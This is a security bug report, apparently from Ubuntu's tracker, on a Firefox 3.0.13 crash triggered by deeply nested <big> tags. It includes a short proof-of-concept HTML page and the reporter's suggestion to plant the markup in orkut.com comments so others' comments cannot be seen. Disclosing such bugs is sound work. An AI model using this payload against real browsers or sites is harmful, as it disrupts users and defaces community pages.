mozilla firefox crashes on big format.
User-Agent:       Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13

*** This bug is a security vulnerability ***
 
Private security bug reported:
 
Binary package hint: firefox-3.0
 
mozilla firefox crashes on big format.
 
Proof of concept.You can restart the desktop just run this code in firefox: 
---------------------------------------start cut here-----------------------------------------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Bug D.O.S. Firefox 3.0.13 - by SnakingMax</title>
Author: David A.P. E-Mail:snakingmax@hotmail.com
<big><big><big><big><big><big><big><big><big><big><big><big><big><big><big>Tu firefox está a punto de reiniciarse</big></big></big></big></big></big></big></big></big></big></big></big></big></big></big>
</body>
</html>
-----------------------------------end cut here-----------------------------------------------------
A cracker can also make a comment, for example (I tried it), www.orkut.com and ensure that nobody can see the other comments. It's just an idea. 
 
Regards,
David A.P
 
ProblemType: Bug
Architecture: i386
DistroRelease: Ubuntu 9.04
NonfreeKernelModules: nvidia
Package: firefox-3.0 3.0.13+nobinonly-0ubuntu0.9.04.1
ProcEnviron:
 LANGUAGE=es_ES:es:en_GB:en
 LANG=es_ES.UTF-8
 SHELL=/bin/bash
SourcePackage: firefox-3.0
Uname: Linux 2.6.28-15-generic i686
 
** Affects: firefox-3.0 (Ubuntu)
     Importance: Undecided
         Status: New
 
 
** Tags: apport-bug i386
 
-- 

Reproducible: Always